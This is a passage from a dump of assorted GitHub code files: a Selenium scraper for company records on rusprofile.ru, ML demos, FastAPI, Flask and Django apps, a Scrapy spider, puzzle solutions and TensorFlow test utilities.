WebDriverWait(driver, 3)\n\n\ndef element_is_exist(by, path, wait):\n try:\n # driver.find_element(by, path)\n wait.until(EC.presence_of_element_located((by, path)))\n return True\n except Exception:\n return False\n\n\ndef auth(driver, wait, 
mail, password):\n # Находим конпку для авторизации\n button = wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'login-tools__user')))\n button.click()\n # Находим поля мыла и пароля\n mail_field = wait.until(EC.presence_of_element_located((By.ID, \"mw-l_mail\")))\n password_field = driver.find_element(By.ID, 'mw-l_pass')\n\n mail_field.send_keys(mail)\n password_field.send_keys(password)\n # Кнопка заверешения авторизации\n login_button = driver.find_element(By.ID, \"mw-l_entrance\")\n login_button.click()\n\n # если появляется дурацкое окно\n if element_is_exist(By.XPATH, \"/html/body/div[5]/div/div/div/div/div[6]\", wait):\n skip_button = wait.until(EC.presence_of_element_located((By.XPATH, \"/html/body/div[5]/div/div/div/div/div[6]\")))\n skip_button.click()\n return True\n\n return True\n\n\ndef get_data(driver, wait, inn_code):\n data = {}\n\n # Делаем query-запрос на руспрофайл с данным ИНН\n try:\n driver.get(url=f'https://www.rusprofile.ru/search?query={inn_code}&type=ul')\n except Exception as e:\n print(e)\n return None\n\n # Проверяем страничку, выданную поиском\n\n # Поиск ОПФ, названия организации\n pattern = re.compile(r\"(\\S+?)\\s*(\\\"*[\\w\\s\\d-]*?\\\"*)\")\n org_name = pattern.search(driver.find_element(By.CSS_SELECTOR, \".company-header>.company-header__row>h1\").text)\n print(org_name.group())\n opf = org_name.group(1)\n data.update({\"opf\": opf})\n organization = org_name.group(2)\n data.update({\"organization\": organization})\n\n # Поиск мыла\n if element_is_exist(By.CSS_SELECTOR, \".mail>.light\", wait): # Если мыла нет вообще\n email = \"-\"\n else:\n email = driver.find_element(By.CSS_SELECTOR, \".mail>span>a\").text\n\n data.update({\"email\": email})\n\n # Поиск директора\n director = driver.find_element(By.XPATH,\n \"/html/body/div[2]/div/div/div[2]/div[1]/div[1]/div/div/div[2]/div[1]/div[3]/span[3]\").text\n data.update({\"director\": director})\n\n # Поиск адреса\n address = driver.find_element(By.XPATH, \"//*[@id='anketa']/div[2]/div[1]/div[2]/address/span[2]\").text\n data.update({\"address\": address})\n\n # Поиск телефона\n if element_is_exist(By.CSS_SELECTOR, \".phone>.light\", wait): # Если номероов нет вообще\n phones = None\n elif element_is_exist(By.XPATH,\n \"/html/body/div[2]/div/div/div[2]/div[1]/div[1]/div/div/div[2]/div[2]/div[3]/div[1]/div/span[4]/button\", wait): # Если есть кнопка \"Ещё N номеров\"\n phones = []\n\n more_button = driver.find_element(By.XPATH,\n \"/html/body/div[2]/div/div/div[2]/div[1]/div[1]/div/div/div[2]/div[2]/div[3]/div[1]/div/span[4]/button\")\n more_button.click()\n\n first_phones = driver.find_elements(By.CSS_SELECTOR, \".phone>span>a\")\n hidden_phones = driver.find_elements(By.CSS_SELECTOR, \".phone>.hidden-text>span>a\")\n\n for item in first_phones:\n phones += [item.text]\n for item in hidden_phones:\n phones += [item.text]\n else:\n phones = []\n\n first_phones = driver.find_elements(By.CSS_SELECTOR, \".phone>span>a\")\n\n for item in first_phones:\n phones += [item.text]\n\n data.update({\"phones\": phones})\n\n return data\n\n\n\n","repo_name":"E6YJI6EK/rusprofile-parser","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23409381327","text":"# Always prefer setuptools over distutils\nfrom setuptools import setup, find_packages\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# 
Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='weixin',\n version='0.1.0',\n\n description='A weixin api project',\n long_description=long_description,\n\n url='https://github.com/ujsxn/weixin',\n\n author='Nan Xiang',\n author_email='514580344@qq.com',\n\n license='GPLv3',\n\n classifiers=[\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 3 - Alpha',\n\n 'Intended Audience :: Developers',\n 'Topic :: Software Development',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Programming Language :: Python :: 2.7',\n ],\n\n keywords='weixin wechat api',\n\n packages=find_packages(exclude=['docs', 'tests']),\n\n install_requires=['requests', 'redis'],\n\n)","repo_name":"ujsxn/weixin","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36702543492","text":"from argparse import ArgumentParser\n\nimport mmcv\n\nimport mmcv_custom # noqa: F401,F403\nimport mmseg_custom # noqa: F401,F403\nfrom mmseg.apis import inference_segmentor, init_segmentor, show_result_pyplot\nfrom mmseg.core.evaluation import get_palette\nfrom mmcv.runner import load_checkpoint\nfrom mmseg.core import get_classes\nimport cv2\nimport os.path as osp\nimport glob\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('config', help='Config file')\n parser.add_argument('checkpoint', help='Checkpoint file')\n parser.add_argument('img_dir', help='Image file')\n parser.add_argument('val_list', help='Validation list')\n\n parser.add_argument('--out', type=str, default=\"inference\", help='out dir')\n parser.add_argument(\n '--device', default='cuda:0', help='Device used for inference')\n parser.add_argument(\n '--palette',\n default='cityscapes',\n help='Color palette used for segmentation map')\n parser.add_argument(\n '--opacity',\n type=float,\n default=0.5,\n help='Opacity of painted segmentation map. 
In (0, 1] range.')\n args = parser.parse_args()\n\n # build the model from a config file and a checkpoint file\n \n model = init_segmentor(args.config, checkpoint=None, device=args.device)\n checkpoint = load_checkpoint(model, args.checkpoint, map_location='cpu')\n if 'CLASSES' in checkpoint.get('meta', {}):\n model.CLASSES = checkpoint['meta']['CLASSES']\n else:\n model.CLASSES = get_classes(args.palette)\n \n f = open(args.val_list, 'r')\n for line in f.readlines():\n line = line.strip()\n # for img in glob.glob(args.img_dir + line + '.jpeg'):\n img = args.img_dir + line + '.jpeg'\n # test a single image\n result = inference_segmentor(model, img)\n # show the results\n if hasattr(model, 'module'):\n model = model.module\n # img = model.show_result(args.img, result,\n # palette=get_palette(args.palette),\n # show=False, opacity=args.opacity)\n\n classes = ('cloudy', 'uncertain clear', 'probably clear', 'confident clear')\n palette = [[255, 0, 0], [0, 255, 0], [0, 0, 255], [128, 128, 0]]\n # RED, GREEN, BLUE, YELLOW\n \n result = model.show_result(img, result,\n palette = palette,\n show=False, opacity=args.opacity)\n\n mmcv.mkdir_or_exist(args.out)\n out_path = osp.join(args.out, osp.basename(img))\n cv2.imwrite(out_path, result)\n print(f\"Result is save at {out_path}\")\n # changed\n\nif __name__ == '__main__':\n main()","repo_name":"Jaehoon-zx/ViT-Adapter-Segmentation","sub_path":"segmentation/image_demo.py","file_name":"image_demo.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9665041527","text":"# Image subtraction \r\n# Created by Korn Visaltanachoti\r\n\r\nfrom PIL import Image\r\n\r\n# Open the two input images\r\nimage1 = Image.open(\"15.jpg\")\r\nimage2 = Image.open(\"14.jpg\")\r\n\r\n# Ensure both images are the same size\r\nif image1.size != image2.size:\r\n raise ValueError(\"Input images must be the same size\")\r\n\r\n# Create a new image for the output\r\noutput = Image.new(image1.mode, image1.size)\r\n\r\n# Perform image subtraction\r\nfor x in range(image1.width):\r\n for y in range(image1.height):\r\n pixel1 = image1.getpixel((x, y))\r\n pixel2 = image2.getpixel((x, y))\r\n if pixel1 == pixel2:\r\n output.putpixel((x, y), (0, 0, 0))\r\n else:\r\n output.putpixel((x, y), pixel1)\r\n\r\n# Save the output image\r\noutput.save(\"output.jpg\")\r\n","repo_name":"Mhonns/HydroponicPowerPlant","sub_path":"ImageProcessing/ImageSub.py","file_name":"ImageSub.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41295772451","text":"from fastapi import FastAPI, Depends\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom .core.bing import BingMiddleware\nfrom .core.startup import startup_event_handler\nfrom .core.config import settings\n# from .core.auth import verify_api_key # deprecated\nfrom .routers import api\n\nfrom square_auth.auth import Auth\nauth = Auth()\n\ndef get_app():\n app = FastAPI(title=\"SQuARE Datastore API\",\n dependencies=[Depends(auth)],\n openapi_url=settings.OPENAPI_URL)\n\n app.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n app.add_middleware(BingMiddleware)\n\n app.include_router(api.router, prefix=settings.API_PREFIX)\n\n return app\n\n\napp = get_app()\n\n@app.on_event(\"startup\")\nasync def startup_event():\n await 
startup_event_handler()\n","repo_name":"UKP-SQuARE/square-core","sub_path":"datastore-api/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"3"} +{"seq_id":"18600923020","text":"\"\"\"\r\nApplication Commands:\r\n1. Title - Get the Title of the page\r\n2. Current Url - Get the current url\r\n3. Page_source - Get the page source\r\n4. get() - Open the application url\r\n\"\"\"\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.service import Service\r\n\r\nsite_url = \"http://automationpractice.com/index.php\"\r\ndriver_path = \"D:\\Development\\driver\\Chrome\\chromedriver.exe\"\r\n\r\nserv_obj = Service(driver_path)\r\n\r\nwith webdriver.Chrome(service=serv_obj) as driver: # we need to user service=serv_obj, but it's showing error\r\n driver.maximize_window() # maximize the browser window\r\n driver.get(site_url)\r\n print(f\"Page Title: {driver.title}\") # title command gets the page title\r\n print(f\"Current URL: {driver.current_url}\") # current_url command gets the url\r\n print(f\"Page Source: {driver.page_source}\") # page_source command gets the page source\r\n","repo_name":"gokuldevp/Selenium-Using-Python","sub_path":"Session 5/Appcommands.py","file_name":"Appcommands.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35596176245","text":"from textgenrnn import textgenrnn\n###初始化文本生成实例\n# textgen = textgenrnn(weights_path='textgenrnnword_weights.hdf5',vocab_path='textgenrnnword_vocab.json',name='textgenrnnword')\ntextgen = textgenrnn(weights_path='textgenrnnchar_weights.hdf5',vocab_path='textgenrnnchar_vocab.json',name='textgenrnnchar')\n##预训练模型基础上训练新文本\n# textgen.train_from_file('datasets/test.txt', num_epochs=5,word_level=False)\n# textgen.generate(5,temperature=[0.5])\n# ###训练新模型\n# textgen.reset()\n# textgen.train_from_file('datasets/hacker_news_10.txt', num_epochs=10,gen_epochs=5,train_size=0.8,dropout=0.2,new_model=True,word_level=False)\n# textgen.generate(5,temperature=[0.5])\n# ##指定开头生成��子\n# textgen.generate_samples(prefix='借钱',temperatures=[0.5])\n# textgen.generate(prefix='宣',temperature=[0.5])\n#\n# ##相似计算\n# print(textgen.similarity(text='套路贷业务员会怎么判',texts=['套路贷业务员会怎么判','怎么判断和防范“套路贷','业务员如何解决被拖欠款项'],use_pca=False))\n###生成向量\ntexts = ['套路贷业务员会怎么判',\n '怎么判断和防范“套路贷']\nword_vector = textgen.encode_text_vectors(texts, pca_dims=None)\nprint(word_vector)\nprint(word_vector.shape)","repo_name":"jinjiajia/textgenrnn-chinese","sub_path":"textgenrnn-chinese/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"13874334693","text":"from utils import *\nfrom flask import Flask\nimport pandas as pd \nfrom flask import request, jsonify\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n\nn_gram_counts_list = []\nfor n in range(1, 6):\n n_model_counts = count_n_grams(train_data_processed, n)\n n_gram_counts_list.append(n_model_counts)\n\n\n@app.route(\"/suggest\" , methods =[\"POST\"])\ndef get_suggestion():\n data = request.json[\"text\"] \n\n print(data)\n\n previous_tokens = nltk.word_tokenize(data)\n tmp_suggest4 = get_suggestions(previous_tokens, n_gram_counts_list, vocabulary, k=1.0)\n \n return jsonify( tmp_suggest4)\n\nif __name__ == 
\"__main__\":\n\n \n app.run()\n ","repo_name":"abdouaziz/autocomplet","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"70162376403","text":"from time import perf_counter\r\n\r\nwith open('17.txt', 'r') as file:\r\n inp = file.read().strip()\r\n\r\nt1_start = perf_counter()\r\n\r\nLEN = len(inp)\r\n# coordinates of rock squares relative to bottom left\r\nD = { 0: [(0,0),(1,0),(2,0),(3,0)],\r\n 1: [(1,0),(0,1),(1,1),(2,1),(1,2)],\r\n 2: [(0,0),(1,0),(2,0),(2,1),(2,2)],\r\n 3: [(0,0),(0,1),(0,2),(0,3)],\r\n 4: [(0,0),(0,1),(1,0),(1,1)] }\r\n\r\ndef print_grid(grid):\r\n for l in reversed(grid):\r\n print(' '.join(l))\r\n print()\r\n\r\ndef add(v, u):\r\n return tuple(map(sum, zip(v, u)))\r\n\r\ndef is_valid(rock, B):\r\n for x,_ in rock:\r\n if x < 0 or x >= 7: return False\r\n for x,y in rock:\r\n if (x,y) in B or y < 0: return False\r\n return True\r\n\r\ndef move_rock(rock, v, B):\r\n moved = [add(r,v) for r in rock]\r\n return moved if is_valid(moved, B) else rock\r\n\r\ndef update_height(rock, H):\r\n for x,y in rock:\r\n if y+1 > H[x]: H[x] = y+1\r\n\r\ngrid = [['.' for _ in range(7)] for _ in range(20)]\r\n\r\ndef ground_sig(low,B):\r\n return frozenset([(x,y-low) for x,y in B if y>=low])\r\n\r\ndef solve(n):\r\n seen = {}\r\n H = [0 for _ in range(7)] # highest y for each x\r\n B = set() # blocked\r\n j, i = 0, 0\r\n added = 0\r\n while i < n:\r\n rock = D[i%len(D)]\r\n offset = 2,max(H)+3\r\n rock = move_rock(rock, offset, B)\r\n while True:\r\n # horizontal move\r\n move = (1,0) if inp[j%LEN] == '>' else (-1,0)\r\n j += 1\r\n rock = move_rock(rock, move, B)\r\n # vertical move\r\n moved = move_rock(rock, (0,-1), B)\r\n if rock != moved:\r\n rock = moved\r\n else:\r\n update_height(rock, H)\r\n break\r\n B.update(rock)\r\n top = max(H)\r\n sig = (ground_sig(min(H), B), j%LEN, i%5)\r\n if sig in seen and i >= 2022:\r\n oi, otop = seen[sig]\r\n dy = top-otop\r\n di = i - oi\r\n amt = (n-i)//di\r\n added += dy*amt\r\n i += amt*di\r\n seen[sig] = i,top\r\n i += 1\r\n return added+max(H)\r\n\r\nsol_a = solve(2022)\r\nsol_b = solve(1_000_000_000_000)\r\n\r\nt1_stop = perf_counter()\r\n\r\nprint('part a:', sol_a)\r\nprint('part b:', sol_b)\r\nprint('time:', t1_stop-t1_start)","repo_name":"kilzm/aoc","sub_path":"python22/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2088591889","text":"# Write a function to determine if a word (or phrase) is a palindrome.\n\n# A palindrome is a word, number, phrase, or other sequence of characters which reads the \n# same backward as forward, such as madam, racecar. \n\n# Qs what if single digit or character? \n# also sentences? is it ok to ignore ignore capitalization, punctuation, and word boundaries? \n\n# rephrasing: if I can reverse a list without changing its meaning.\n# reverse list. \n# then check if identical... \n# this is the brute force... 
O(n+n) so O(n)\n\ndef rev_list(arr):\n length = len(arr)\n arr_ret = [\"\"]*length\n for i in range(0, length):\n arr_ret[i] = arr[length- i -1]\n return arr_ret\n\ndef compare(arr, rev_arr): \n for i in range(0, len(arr)):\n if arr[i] != rev_arr[i]:\n return False\n return True\n\n### testing ...\n# two known examples\n# odd length\narr = \"madam\" \nprint(arr)\nrev_arr = rev_list(arr)\nprint(compare(arr, rev_arr))\n# odd length\narr = \"racecar\"\nprint(arr)\nrev_arr = rev_list(arr)\nprint(compare(arr, rev_arr))\n# even length \narr = \"abba\"\nprint(arr)\nrev_arr = rev_list(arr)\nprint(compare(arr, rev_arr))\n\n# double letter\narr = \"aa\"\nprint(arr)\nrev_arr = rev_list(arr)\nprint(compare(arr, rev_arr))\narr = \"ab\"\nprint(arr)\nrev_arr = rev_list(arr)\nprint(compare(arr, rev_arr))\n# single letter\narr = \"a\"\nprint(arr)\nrev_arr = rev_list(arr)\nprint(compare(arr, rev_arr))\n\n# not a palindrome\narr = \"acestar\"\nprint(arr)\nrev_arr = rev_list(arr)\nprint(compare(arr, rev_arr))\nprint(\"\")\n\n# a better algo: \n# find half\n# int(len(arr)/2)\n# compare index i == length-1-i (in 1st half vs 2nd half for half the array)\n# O(n/2) so O(n) for single words or numbers. More if sentences where spaces, punctation and caps need to be removed \n\ndef find_pdrome(arr):\n if arr == None:\n retrun -1\n # drop spaces, punctations and caps (when dealing with sentences)\n arr = drop_space(arr)\n arr = drop_punct(arr)\n arr = decap(arr)\n length = len(arr)\n for i in range(0, int(length/2)):\n if arr[i] != arr[length-1-i]:\n return False\n return True\n\ndef drop_space(arr):\n # O(n)\n arr_ret = []\n for i in arr:\n if i != \" \":\n arr_ret.append(i)\n return arr_ret\n\n# could combine with drop_space to reduce total O() \ndef drop_punct(arr):\n myset = {'.',',','?','!'}\n arr_ret = [\"\"]*len(arr)\n i = 0\n j = 0\n while i < len(arr):\n if arr[i] not in myset:\n arr_ret[j] = arr[i]\n j += 1\n i += 1\n return arr_ret[0:j]\n\ndef decap(arr):\n arr_ret = [\"\"]*len(arr)\n for i in range(0,len(arr)):\n if isinstance(arr[i], str):\n arr_ret[i] = arr[i].lower()\n else:\n arr_ret[i] = arr[i]\n return arr_ret\n\n\nprint(\"a better algo: \")\n### testing ...\n# two known examples\n# odd length\narr = \"madam\" \nprint(arr)\nprint(find_pdrome(arr))\n# odd length\narr = \"racecar\"\nprint(arr)\nprint(find_pdrome(arr))\n# even length \narr = \"abba\"\nprint(arr)\nprint(find_pdrome(arr))\n\n# double letter\narr = \"aa\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"ab\"\nprint(arr)\nprint(find_pdrome(arr))\n# single letter\narr = \"a\"\nprint(arr)\nprint(find_pdrome(arr))\n\n# not a palindrome\narr = \"acestar\"\nprint(arr)\nprint(find_pdrome(arr))\n\n# other examples\narr = \"redivider\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"deified\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"civic\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"radar\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"level\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"rotor\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"kayak\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"reviver\"\nprint(arr)\nprint(find_pdrome(arr))\n\n# sentences I found online\narr = \"Mr. 
Owl ate my metal worm\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"Do geese see God?\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"Was it a car or a cat I saw?\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"Was it a cat or a car I saw?\"\nprint(arr)\nprint(find_pdrome(arr))\n\n\n# Then write a second function to receive a word (or phrase) list and determine which word is the longest palindrome.\n\n\nword_list = [\"madam\", \"racecar\", \"abba\", \"aa\", \"ab\", \"a\", \"acestar\", \"redivider\", \"deified\", \"civic\", \"radar\", \"level\", \"rotor\", \"kayak\", \"reviver\", \"Was it a car or a cat I saw?\", \"Mr. Owl ate my metal worm\", \"Do geese see God?\", \"Was it a cat or a car I saw?\"]\nlen_max_pdrom = 0\nmax_pdrom = \"\"\nfor arr in word_list:\n if find_pdrome(arr) and len(arr) > len_max_pdrom:\n len_max_pdrom = len(arr)\n max_pdrom = arr\n\nprint(max_pdrom)","repo_name":"markbroich/data_science","sub_path":"coding_challenges_example_solutions/palindrome/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":4524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20234522276","text":"from django.contrib import messages\nfrom django.shortcuts import (\n render, redirect, reverse, HttpResponse, get_object_or_404\n )\nfrom products.models import Product, Category\n\n\ndef view_basket(request):\n \"\"\"\n A view to display the basket page\n \"\"\"\n product = Product.objects.all()\n categories = Category.objects.all()\n context = {\n 'product': product,\n 'categories': categories\n }\n return render(request, 'basket/basket.html', context)\n\n\ndef add_to_basket(request, pid):\n \"\"\"\n A view to add a quantity of the specified product to the shopping basket\n \"\"\"\n product = get_object_or_404(Product, pk=pid)\n quantity = int(request.POST.get('quantity'))\n basket = request.session.get('basket', {})\n if not product:\n messages.error(request, 'Product does not exist!')\n return redirect(reverse('view_basket'))\n if pid in list(basket.keys()):\n basket[pid] += quantity\n messages.success(\n request, f'Updated {product.name} quantity to {basket[pid]}'\n )\n else:\n basket[pid] = quantity\n messages.success(\n request, f'Added {product.name} to your basket'\n )\n request.session['basket'] = basket\n\n # redirect the current page\n return redirect(request.META['HTTP_REFERER'])\n\n\ndef adjust_basket(request, pid):\n \"\"\"\n Update quantity of the specified product to the shopping basket\n \"\"\"\n product = get_object_or_404(Product, pk=pid)\n quantity = int(request.POST.get('quantity'))\n basket = request.session.get('basket', {})\n if not product:\n messages.error(\n request, 'Product does not exist'\n )\n return redirect(\n reverse('view_basket')\n )\n if quantity > 0:\n basket[pid] = quantity\n messages.success(\n request, f'Updated {product.name} quantity to {basket[pid]}'\n )\n else:\n basket.pop(pid)\n messages.success(\n request, f'Removed {product.name} from your basket'\n )\n request.session['basket'] = basket\n return redirect(reverse('view_basket'))\n\n\ndef remove_from_basket(request, pid):\n \"\"\"Remove the item from the shopping bag\"\"\"\n try:\n product = get_object_or_404(Product, pk=pid)\n basket = request.session.get('basket', {})\n basket.pop(pid)\n print(basket)\n messages.success(\n request, f'Removed {product.name} from your bag'\n )\n request.session['basket'] = basket\n return HttpResponse(status=200)\n\n except Exception as e:\n messages.error(\n request, f'Error 
removing item: {e}'\n )\n return HttpResponse(status=500)\n","repo_name":"mabin9527/online_bookstore","sub_path":"basket/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74823766162","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy import Request\nimport json\nimport os\nclass NpsAttractionsSpider(scrapy.Spider):\n name = 'nps_attractions'\n allowed_domains = ['tripadvisor.com']\n def __init__(self):\n self.parkname =''\n\n def start_requests(self):\n data = json.loads(open('/Users/h/national_park_scrapy/nps_tripadvisor/nps_tripadvisor/spiders/nps_urls.json').read())\n nps_dict = dict(data)\n for key, value in nps_dict.iteritems():\n self.parkname = key\n print(key)\n print(value)\n yield Request(value, callback=self.parse, meta={'Name': key})\n\n\n def parse(self, response):\n attraction_points = response.xpath('//div[@class=\"listing_info\"]')\n name=self.parkname.replace(\"_\", \" \")\n for point in attraction_points:\n title = point.xpath('div[@class=\"listing_title \"]/a/text()').extract_first()\n url = point.xpath('div[@class=\"listing_title \"]/a/@href').extract_first()\n description = point.xpath('div[@class=\"listing_rating\"]/div[@class=\"popRanking wrap\"]/text()').extract_first()\n activity_types = point.xpath('div[@class=\"tag_line\"]/div[@class=\"p13n_reasoning_v2\"]/a/span/text()').extract()\n tags = [activity_type for activity_type in activity_types]\n yield{'name':name, 'data': {'url': url, 'title': title,'description':description, 'tags':tags}}\n relative_next_url = response.xpath('//a[@class=\"nav next rndBtn ui_button primary taLnk\"]/@href').extract_first()\n part_urls = response.url.split('/Attractions')\n absolute_next_url = str(part_urls[0])+ str(relative_next_url)\n yield Request(absolute_next_url, callback=self.parse)\n","repo_name":"toanphan0303/nps_scrapy","sub_path":"nps_tripadvisor/nps_tripadvisor/spiders/nps_attractions.py","file_name":"nps_attractions.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15425445272","text":"import random\nimport tempfile\n\nfrom tensorflow.python import keras\nfrom tensorflow.python.data.ops import dataset_ops\nfrom tensorflow.python.eager import def_function\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import tensor_spec\nfrom tensorflow.python.keras.layers.preprocessing import string_lookup\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.platform import test\n\n\nclass DistributeKplTestUtils(test.TestCase):\n \"\"\"Utils for test of tf.distribute + KPL.\"\"\"\n FEATURE_VOCAB = [\n \"avenger\", \"ironman\", \"batman\", \"hulk\", \"spiderman\", \"kingkong\",\n \"wonder_woman\"\n ]\n LABEL_VOCAB = [\"yes\", \"no\"]\n\n def define_kpls_for_training(self, use_adapt):\n \"\"\"Function that defines KPL used for unit tests of tf.distribute.\n\n Args:\n use_adapt: if adapt will be called. 
False means there will be precomputed\n statistics.\n\n Returns:\n feature_mapper: a simple keras model with one keras StringLookup layer\n which maps feature to index.\n label_mapper: similar to feature_mapper, but maps label to index.\n\n \"\"\"\n if use_adapt:\n feature_lookup_layer = (\n string_lookup.StringLookup(\n num_oov_indices=1))\n feature_lookup_layer.adapt(self.FEATURE_VOCAB)\n label_lookup_layer = (\n string_lookup.StringLookup(\n num_oov_indices=0, mask_token=None))\n label_lookup_layer.adapt(self.LABEL_VOCAB)\n else:\n feature_lookup_layer = (\n string_lookup.StringLookup(\n vocabulary=self.FEATURE_VOCAB, num_oov_indices=1))\n label_lookup_layer = (\n string_lookup.StringLookup(\n vocabulary=self.LABEL_VOCAB, num_oov_indices=0, mask_token=None))\n\n raw_feature_input = keras.layers.Input(\n shape=(3,), dtype=dtypes.string, name=\"feature\", ragged=True)\n feature_id_input = feature_lookup_layer(raw_feature_input)\n feature_mapper = keras.Model({\"features\": raw_feature_input},\n feature_id_input)\n\n raw_label_input = keras.layers.Input(\n shape=(1,), dtype=dtypes.string, name=\"label\")\n label_id_input = label_lookup_layer(raw_label_input)\n label_mapper = keras.Model({\"label\": raw_label_input}, label_id_input)\n\n return feature_mapper, label_mapper\n\n def dataset_fn(self, feature_mapper, label_mapper):\n \"\"\"Function that generates dataset for test of tf.distribute + KPL.\n\n Args:\n feature_mapper: a simple keras model with one keras StringLookup layer\n which maps feature to index.\n label_mapper: similar to feature_mapper, but maps label to index.\n\n Returns:\n Generated dataset for test of tf.distribute + KPL.\n\n \"\"\"\n\n def feature_and_label_gen():\n # Generator of dataset.\n while True:\n features = random.sample(self.FEATURE_VOCAB, 3)\n label = [\"yes\"] if self.FEATURE_VOCAB[0] in features else [\"no\"]\n yield {\"features\": features, \"label\": label}\n\n raw_dataset = dataset_ops.Dataset.from_generator(\n feature_and_label_gen,\n output_signature={\n \"features\": tensor_spec.TensorSpec([3], dtypes.string),\n \"label\": tensor_spec.TensorSpec([1], dtypes.string)\n }).shuffle(100).batch(32)\n\n train_dataset = raw_dataset.map(lambda x: ( # pylint: disable=g-long-lambda\n {\n \"features\": feature_mapper(x[\"features\"])\n }, label_mapper(x[\"label\"])))\n return train_dataset\n\n def define_model(self):\n \"\"\"A simple model for test of tf.distribute + KPL.\"\"\"\n # Create the model. 
The input needs to be compatible with KPLs.\n model_input = keras.layers.Input(\n shape=(3,), dtype=dtypes.int64, name=\"model_input\")\n\n # input_dim includes a mask token and an oov token.\n emb_output = keras.layers.Embedding(\n input_dim=len(self.FEATURE_VOCAB) + 2, output_dim=20)(\n model_input)\n emb_output = math_ops.reduce_mean(emb_output, axis=1)\n dense_output = keras.layers.Dense(\n units=1, activation=\"sigmoid\")(\n emb_output)\n model = keras.Model({\"features\": model_input}, dense_output)\n return model\n\n def define_reverse_lookup_layer(self):\n \"\"\"Create string reverse lookup layer for serving.\"\"\"\n\n label_inverse_lookup_layer = string_lookup.StringLookup(\n num_oov_indices=0,\n mask_token=None,\n vocabulary=self.LABEL_VOCAB,\n invert=True)\n return label_inverse_lookup_layer\n\n def create_serving_signature(self, model, feature_mapper,\n label_inverse_lookup_layer):\n \"\"\"Create serving signature for the given model.\"\"\"\n\n @def_function.function\n def serve_fn(raw_features):\n raw_features = array_ops.expand_dims(raw_features, axis=0)\n transformed_features = model.feature_mapper(raw_features)\n outputs = model(transformed_features)\n outputs = array_ops.squeeze(outputs, axis=0)\n outputs = math_ops.cast(math_ops.greater(outputs, 0.5), dtypes.int64)\n decoded_outputs = model.label_inverse_lookup_layer(outputs)\n return array_ops.squeeze(decoded_outputs, axis=0)\n\n model.feature_mapper = feature_mapper\n model.label_inverse_lookup_layer = label_inverse_lookup_layer\n # serving does NOT have batch dimension\n return serve_fn.get_concrete_function(\n tensor_spec.TensorSpec(\n shape=(3), dtype=dtypes.string, name=\"example\"))\n\n def test_save_load_serving_model(self, model, feature_mapper,\n label_inverse_lookup_layer):\n \"\"\"Test save/load/serving model.\"\"\"\n\n serving_fn = self.create_serving_signature(model, feature_mapper,\n label_inverse_lookup_layer)\n\n saved_model_dir = tempfile.mkdtemp(dir=self.get_temp_dir())\n model.save(saved_model_dir, save_format=\"tf\",\n signatures={\"serving_default\": serving_fn})\n\n # Test the saved_model.\n loaded_serving_fn = keras.saving.save.load_model(\n saved_model_dir).signatures[\"serving_default\"]\n\n # check the result w/ and w/o avenger.\n prediction0 = loaded_serving_fn(\n 